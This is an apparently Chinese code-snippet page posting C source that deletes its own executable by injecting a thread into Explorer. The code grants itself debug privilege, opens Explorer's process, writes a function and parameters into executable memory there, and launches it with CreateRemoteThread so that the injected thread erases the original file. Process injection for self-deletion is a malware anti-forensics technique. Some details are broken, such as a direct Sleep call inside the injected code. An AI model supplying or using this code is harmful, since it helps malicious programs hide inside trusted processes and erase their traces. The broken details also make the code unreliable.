远线程删除自身(来自SWAN)

#include <windows.h>
#include <stdio.h>

#ifndef DELETE_SELF_SWAN
#define DELETE_SELF_SWAN $$$
typedef HINSTANCE (__stdcall *rfdeleteLoadLibraryW)(LPCTSTR);
typedef FARPROC (__stdcall *rfdeleteGetProcAddress)(HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *rfdeleteGetModuleHandle)(LPCTSTR);

typedef DWORD (__stdcall *rfdeleteDeleteFileA)(char*);
typedef void (__stdcall *rfdeleteSleep)(DWORD);

struct DeleteInfo
{
DWORD interval;
char filename[255];
};

struct RemoteParam
{
rfdeleteLoadLibraryW fnLoadLibrary;
rfdeleteGetProcAddress fnGetProcAddress;
rfdeleteGetModuleHandle fnGetModuleHandle;

//必须得传过去的函数名字
char strKernel32[32];
char strSleep[32];
char strDeleteFileA[32];
DeleteInfo di;
};


DWORD WINAPI RemoteDeleteSelfThread(void *para)
{
//动态加载&&获得函数地址
RemoteParam *rp=(RemoteParam *)para;
//kernel32.dll
HMODULE hModule = rp->fnGetModuleHandle(rp->strKernel32);
rfdeleteDeleteFileA fnDeleteFileA = (rfdeleteDeleteFileA)rp->fnGetProcAddress(hModule, rp->strDeleteFileA);
rfdeleteSleep fnSleep = (rfdeleteSleep)rp->fnGetProcAddress(hModule, rp->strSleep);

de:
if(fnDeleteFileA(rp->di.filename) != 0)
goto re;
Sleep(rp->di.interval);
goto de;
re:
return true;
}

DWORD DeleteSelf()
{
RemoteParam rp;
int iReturnCode;
int iSizeNeed = (int)DeleteSelf - (int)RemoteDeleteSelfThread + 1102;
HWND hWnd = FindWindow("Progman", "Program Manager");
if(!hWnd)
{
return false;
}
DWORD dwRemoteProcessId;
GetWindowThreadProcessId(hWnd, &dwRemoteProcessId);
//给自己debug权限
HANDLE hToken;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid))
return false;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL))
return false;
CloseHandle(hToken);
    }
//
HANDLE hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, FALSE, dwRemoteProcessId );
if(!hRemoteProcess)
{
return false;
}
LPVOID pStart = VirtualAllocEx(hRemoteProcess, NULL, iSizeNeed, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(!pStart)
{
CloseHandle(hRemoteProcess);
return false;
}
iReturnCode = WriteProcessMemory(hRemoteProcess, pStart, RemoteDeleteSelfThread, iSizeNeed, NULL);
if(!iReturnCode)
{
CloseHandle(hRemoteProcess);
return false;
}

//初始化要传过去的参数
HMODULE hKernel32 = LoadLibrary("kernel32.dll");
rp.fnLoadLibrary = (rfdeleteLoadLibraryW)GetProcAddress(hKernel32, "LoadLibraryA");
rp.fnGetProcAddress = (rfdeleteGetProcAddress)GetProcAddress(hKernel32, "GetProcAddress");
rp.fnGetModuleHandle = (rfdeleteGetModuleHandle)GetProcAddress(hKernel32, "GetModuleHandleA");

strcpy(rp.strKernel32, "kernel32.dll");
strcpy(rp.strSleep, "Sleep");
strcpy(rp.strDeleteFileA, "DeleteFileA");
GetModuleFileName(NULL, rp.di.filename, 255);
rp.di.interval = 200;


//写入传递过去的参数
PVOID pParam = VirtualAllocEx(hRemoteProcess, NULL, sizeof(RemoteParam), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(!pParam)
{
VirtualFreeEx(hRemoteProcess, pStart, iSizeNeed, MEM_DECOMMIT);
CloseHandle(hRemoteProcess);
return false;
}
iReturnCode = WriteProcessMemory(hRemoteProcess, pParam, &rp, sizeof(RemoteParam), NULL);
if(!iReturnCode)
{
VirtualFreeEx(hRemoteProcess, pParam, sizeof(RemoteParam), MEM_DECOMMIT);
VirtualFreeEx(hRemoteProcess, pStart, iSizeNeed, MEM_DECOMMIT);
CloseHandle(hRemoteProcess);
return false;
}
HANDLE hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
(PTHREAD_START_ROUTINE)pStart, pParam, 0, NULL);

if(!hRemoteThread)
{
VirtualFreeEx(hRemoteProcess, pParam, sizeof(RemoteParam), MEM_DECOMMIT);
VirtualFreeEx(hRemoteProcess, pStart, iSizeNeed, MEM_DECOMMIT);
CloseHandle(hRemoteProcess);
return false;
}
//WaitForSingleObject(hRemoteThread, -1);
//VirtualFreeEx(hRemoteProcess, pParam, sizeof(RemoteParam), MEM_DECOMMIT);
//VirtualFreeEx(hRemoteProcess, pStart, iSizeNeed, MEM_DECOMMIT);
CloseHandle(hRemoteProcess);
CloseHandle(hRemoteThread);
return true;
}
#endif

 

你可能感兴趣的:(远线程删除自身(来自SWAN))